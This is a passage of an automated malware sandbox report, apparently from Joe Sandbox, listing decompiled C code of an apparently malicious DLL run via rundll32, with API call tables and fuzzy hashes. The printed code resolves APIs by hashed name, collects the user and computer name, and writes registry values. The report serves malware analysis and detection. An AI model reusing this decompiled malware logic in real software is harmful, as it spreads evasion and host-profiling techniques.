								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x444a320; // 0xafd5a8
									_t11 = _t39 + 0x444b779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0444462B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                    0x0444625e
                    0x04446262
                    0x04446324
                    0x04446268
                    0x04446268
                    0x0444626d
                    0x04446280
                    0x04446282
                    0x04446287
                    0x0444628f
                    0x04446296
                    0x0444629a
                    0x0444629d
                    0x0444631c
                    0x0444631d
                    0x0444629f
                    0x0444629f
                    0x044462a4
                    0x044462ac
                    0x044462b0
                    0x044462b3
                    0x00000000
                    0x044462b5
                    0x044462b5
                    0x044462ba
                    0x044462c2
                    0x044462c6
                    0x044462c9
                    0x00000000
                    0x044462cb
                    0x044462cb
                    0x044462d0
                    0x044462d8
                    0x044462dc
                    0x044462df
                    0x00000000
                    0x044462e1
                    0x044462e1
                    0x044462e6
                    0x044462ee
                    0x044462f2
                    0x044462f5
                    0x00000000
                    0x044462f7
                    0x044462fd
                    0x04446302
                    0x04446309
                    0x04446310
                    0x04446313
                    0x00000000
                    0x04446315
                    0x04446318
                    0x04446318
                    0x04446313
                    0x044462f5
                    0x044462df
                    0x044462c9
                    0x044462b3
                    0x0444629d
                    0x04446332

                    APIs
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04441986,?,?,?,?,00000000,00000000), ref: 04446274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04446296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 044462AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044462C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044462D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044462EE
                      • Part of subcall function 0444462B: memset.NTDLL ref: 044446AA
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: 1c2852cbf617cbbe86d76ba35e2a07e3834915dec5463c38bd0d86126df549a3
                    • Instruction ID: ce2e1ee4a90d822f2de3d92a819b0b3e5ee0a49f656c5205af16fb3621672921
                    • Opcode Fuzzy Hash: 1c2852cbf617cbbe86d76ba35e2a07e3834915dec5463c38bd0d86126df549a3
                    • Instruction Fuzzy Hash: E72141B5600246AFFB20DF69C884E5BB7ECEB89744B054466E505D7201EB39FD068F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04442B1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E04442B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x444a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E04445406( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04447488(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E044417AB(_a8);
						goto L29;
					}
					_t64 =  *0x444a318; // 0x4f49d58
					_t16 = _t64 + 0xc; // 0x4f49e7a
					_t65 = E04445406(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d044490
						if(E04445B98(_t97,  *_t33, _t91, _a8,  *0x444a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x444a320; // 0xafd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x444ba3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x444b8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E0444266A(_t69,  *0x444a3d4,  *0x444a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x444a320; // 0xafd5a8
									_t44 = _t71 + 0x444b846; // 0x74666f53
									_t73 = E04445406(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d044490
										E044434EE( *_t47, _t91, _a8,  *0x444a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d044490
										E044434EE( *_t49, _t91, _t99,  *0x444a3d0, _a16);
										E044417AB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d044490
									E044434EE( *_t40, _t91, _a8,  *0x444a3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d044490
									E044434EE( *_t43, _t91, _a8,  *0x444a3d0, _a16);
								}
								if( *_t101 != 0) {
									E044417AB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d044490
					_t81 = E04441BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d044490
							E04445B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E044417AB(_t100);
						_t98 = _a16;
					}
					E044417AB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04447961(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x444a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                    0x04442b1e
                    0x04442b27
                    0x04442b2e
                    0x04442b33
                    0x04442ba0
                    0x04442ba6
                    0x04442bab
                    0x04442bb2
                    0x04442bb9
                    0x04442bbc
                    0x04442d27
                    0x04442d2e
                    0x04442d2e
                    0x04442d33
                    0x04442d35
                    0x04442d35
                    0x04442d3e
                    0x04442d3e
                    0x04442bc2
                    0x04442bce
                    0x04442d1d
                    0x04442d20
                    0x00000000
                    0x04442d20
                    0x04442bd4
                    0x04442bd9
                    0x04442bdc
                    0x04442be3
                    0x04442be6
                    0x04442c2f
                    0x04442c2f
                    0x04442c42
                    0x04442c4c
                    0x04442c54
                    0x04442c59
                    0x04442c63
                    0x04442c63
                    0x04442c5b
                    0x04442c5b
                    0x04442c5b
                    0x04442c5b
                    0x04442c85
                    0x04442c8d
                    0x04442cbb
                    0x04442cc0
                    0x04442cc7
                    0x04442ccc
                    0x04442cd0
                    0x04442d02
                    0x04442cd2
                    0x04442cdf
                    0x04442ce2
                    0x04442cf2
                    0x04442cf5
                    0x04442cfb
                    0x04442cfb
                    0x04442c8f
                    0x04442c9c
                    0x04442c9f
                    0x04442cb1
                    0x04442cb4
                    0x04442cb4
                    0x04442d0c
                    0x04442d18
                    0x04442d0e
                    0x04442d11
                    0x04442d11
                    0x04442d0c
                    0x04442c85
                    0x00000000
                    0x04442c4c
                    0x04442bf5
                    0x04442bf8
                    0x04442bff
                    0x04442c05
                    0x04442c08
                    0x04442c0a
                    0x04442c16
                    0x04442c19
                    0x04442c19
                    0x04442c1f
                    0x04442c24
                    0x04442c24
                    0x04442c2a
                    0x00000000
                    0x04442c2a
                    0x04442b38
                    0x00000000
                    0x04442b5f
                    0x04442b5f
                    0x04442b6b
                    0x04442b7e
                    0x04442b84
                    0x04442b8c
                    0x00000000
                    0x04442b8c

                    APIs
                    • StrChrA.SHLWAPI(04441850,0000005F,00000000,00000000,00000104), ref: 04442B51
                    • lstrcpy.KERNEL32(?,?), ref: 04442B7E
                      • Part of subcall function 04445406: lstrlen.KERNEL32(?,00000000,04F49D58,00000000,04443C77,04F49F7B,69B25F44,?,?,?,?,69B25F44,00000005,0444A00C,4D283A53,?), ref: 0444540D
                      • Part of subcall function 04445406: mbstowcs.NTDLL ref: 04445436
                      • Part of subcall function 04445406: memset.NTDLL ref: 04445448
                      • Part of subcall function 044434EE: lstrlenW.KERNEL32(?,?,?,04442CE7,3D044490,80000002,04441850,04445F20,74666F53,4D4C4B48,04445F20,?,3D044490,80000002,04441850,?), ref: 04443513
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 04442BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: 0b107b832cd42268a359ad60819e4074b12d8c65f54726a53ce9a197259c09a4
                    • Instruction ID: c09a1b0f7d551a9d9dfd2f5f876990208fc704cf3b74f17818decb690aa2b851
                    • Opcode Fuzzy Hash: 0b107b832cd42268a359ad60819e4074b12d8c65f54726a53ce9a197259c09a4
                    • Instruction Fuzzy Hash: 2C518E79100209EFFF229F61DC44EAA77B9FF84384F00845AFA11A6161EB75F965EB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04444DFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E04444DFF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x444a3cc; // 0x4f495b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x444a3cc; // 0x4f495b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x444a3cc; // 0x4f495b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x444b81a) {
					HeapFree( *0x444a2d8, 0, _t10);
					_t7 =  *0x444a3cc; // 0x4f495b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                    0x04444dff
                    0x04444e08
                    0x04444e18
                    0x04444e18
                    0x04444e1d
                    0x04444e22
                    0x00000000
                    0x00000000
                    0x04444e12
                    0x04444e12
                    0x04444e24
                    0x04444e29
                    0x04444e2d
                    0x04444e40
                    0x04444e46
                    0x04444e46
                    0x04444e4f
                    0x04444e51
                    0x04444e55
                    0x04444e5b

                    APIs
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04444E08
                    • Sleep.KERNEL32(0000000A), ref: 04444E12
                    • HeapFree.KERNEL32(00000000), ref: 04444E40
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04444E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: d9bbeaa79f4422566172bf074ab47a936d9c7282359728f70a2c783a30f066cc
                    • Instruction ID: 27523caf74bc0c4ca221c73e3b7a120a1b58018d05f369b82812a642ef911f71
                    • Opcode Fuzzy Hash: d9bbeaa79f4422566172bf074ab47a936d9c7282359728f70a2c783a30f066cc
                    • Instruction Fuzzy Hash: 59F0D4B93802019FFB18CF64ED49B1777B5EBC4701B14800AE802E7390DB38EC11EA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04444B71 Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04444B71() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E044463FD(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E044417AB(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                    0x04444b7f
                    0x04444b82
                    0x04444b85
                    0x04444b8b
                    0x04444b90
                    0x04444b96
                    0x04444b9e
                    0x04444ba1
                    0x04444ba7
                    0x04444bac
                    0x04444bb9
                    0x04444bc6
                    0x04444bca
                    0x04444bcc
                    0x04444bd0
                    0x04444bd3
                    0x04444be3
                    0x04444c35
                    0x04444c36
                    0x04444be5
                    0x04444be8
                    0x04444bef
                    0x04444bf2
                    0x04444c05
                    0x00000000
                    0x04444c07
                    0x04444c0a
                    0x04444c1d
                    0x04444c20
                    0x04444c28
                    0x04444c2b
                    0x00000000
                    0x04444c2d
                    0x04444c2d
                    0x04444c30
                    0x04444c30
                    0x04444c2b
                    0x04444c05
                    0x04444c3b
                    0x04444c3c
                    0x04444bac
                    0x04444c42

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04444B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 04444BA1
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04444BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 04444BFD
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 04444C20
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: bfdca03c6c0f6402501fda5e6299c54aee087f57cbcf80434050476ea2547e72
                    • Instruction ID: e00295700a1a7ae61eccf6ed06a36b74da38f9031c7174ff85b30374c873956f
                    • Opcode Fuzzy Hash: bfdca03c6c0f6402501fda5e6299c54aee087f57cbcf80434050476ea2547e72
                    • Instruction Fuzzy Hash: 6021D9B5900208FBEB21DFE9C9849EEBBB8EE84304B5545AAE501E7200DA34AB45DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04445A5A Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04445A5A(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x444a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x444a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x444a2f8 = _t6;
					 *0x444a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x444a2f4 = _t7;
					if(_t7 == 0) {
						 *0x444a2f4 =  *0x444a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                    0x04445a62
                    0x04445a6a
                    0x04445a6f
                    0x00000000
                    0x04445ac4
                    0x04445a71
                    0x04445a79
                    0x04445a81
                    0x04445a81
                    0x04445ac1
                    0x00000000
                    0x04445ac1
                    0x04445a83
                    0x04445a83
                    0x04445a88
                    0x04445a9a
                    0x04445a9f
                    0x04445aa5
                    0x04445aad
                    0x04445ab2
                    0x04445ab4
                    0x04445ab4
                    0x00000000
                    0x04445abb
                    0x04445a7d
                    0x00000000
                    0x00000000
                    0x04445a7f
                    0x00000000

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04444603,?), ref: 04445A62
                    • GetVersion.KERNEL32 ref: 04445A71
                    • GetCurrentProcessId.KERNEL32 ref: 04445A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04445AA5
                    • GetLastError.KERNEL32 ref: 04445AC4
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: d061310d6a94c7dcc6fd31be6ea543a5d34dc564763fe9ae00350dad5a4d02cf
                    • Instruction ID: 2dae1921445950651590c55eab5c0f99c11fdcf14b376e197990b73e4ef1d463
                    • Opcode Fuzzy Hash: d061310d6a94c7dcc6fd31be6ea543a5d34dc564763fe9ae00350dad5a4d02cf
                    • Instruction Fuzzy Hash: DDF03CB8782301AFFF209F74A849B167A61E7C4B51F00451AE616F62C0D7785841AA15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04443D67 Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 46%
                    			E04443D67(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x444a320; // 0xafd5a8
					_t5 = _t102 + 0x444b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x4449290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x444a320; // 0xafd5a8
												_t28 = _t108 + 0x444b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x444a320; // 0xafd5a8
														_t33 = _t78 + 0x444b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                    0x04443d6c
                    0x04443d75
                    0x04443d76
                    0x04443d7a
                    0x04443d80
                    0x04443d86
                    0x04443d8f
                    0x04443d95
                    0x04443d9f
                    0x04443da1
                    0x04443da7
                    0x04443dac
                    0x04443db7
                    0x04443dbf
                    0x04443dc2
                    0x04443ee5
                    0x04443dc8
                    0x04443dc8
                    0x04443dd5
                    0x04443ddb
                    0x04443de1
                    0x04443de5
                    0x04443deb
                    0x04443df8
                    0x04443dfc
                    0x04443e02
                    0x04443e05
                    0x04443e0b
                    0x04443e11
                    0x04443e17
                    0x04443e1a
                    0x04443e1d
                    0x04443e23
                    0x04443e2c
                    0x04443e32
                    0x04443e33
                    0x04443e36
                    0x04443e37
                    0x04443e38
                    0x04443e40
                    0x04443e41
                    0x04443e42
                    0x04443e44
                    0x04443e48
                    0x04443e4c
                    0x00000000
                    0x00000000
                    0x04443e52
                    0x04443e5b
                    0x04443e61
                    0x04443e6b
                    0x04443e6f
                    0x04443e71
                    0x04443e7e
                    0x04443e82
                    0x04443e8a
                    0x04443e8f
                    0x04443ea1
                    0x04443ea3
                    0x04443ea9
                    0x04443ea9
                    0x04443eb2
                    0x04443eb2
                    0x04443eb4
                    0x04443eba
                    0x04443eba
                    0x04443ebd
                    0x04443ec3
                    0x04443ec6
                    0x04443ecf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04443ecf
                    0x04443e23
                    0x04443e1d
                    0x04443e05
                    0x04443ed5
                    0x04443ed5
                    0x04443edb
                    0x04443edb
                    0x04443ee1
                    0x04443ee1
                    0x04443eea
                    0x04443ef0
                    0x04443ef0
                    0x04443dac
                    0x04443ef9

                    APIs
                    • SysAllocString.OLEAUT32(04449290), ref: 04443DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04443E99
                    • SysFreeString.OLEAUT32(00000000), ref: 04443EB2
                    • SysFreeString.OLEAUT32(?), ref: 04443EE1
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: b0faea9e4ec009f0cc0f1d6bed5409f5f24ab86f57b993647a79d3787dcbd451
                    • Instruction ID: 8d90cac2b23bf8a115b243e648ee0d23d01a7c6d53838f13019ff17452f9d628
                    • Opcode Fuzzy Hash: b0faea9e4ec009f0cc0f1d6bed5409f5f24ab86f57b993647a79d3787dcbd451
                    • Instruction Fuzzy Hash: 78512C75E00509EFEF11DFA8C4888AEF7B9FFC9704B244599E915AB210D771AE01CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444420F Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0444420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E044425C1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04442E5D(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E0444375F(_t101,  &_v428, _a8, _t96 - _t81);
					E0444375F(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04442E5D(_t101, 0x444a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04442E5D(_a16, _a4);
						E04441212(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0444818A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04448184();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
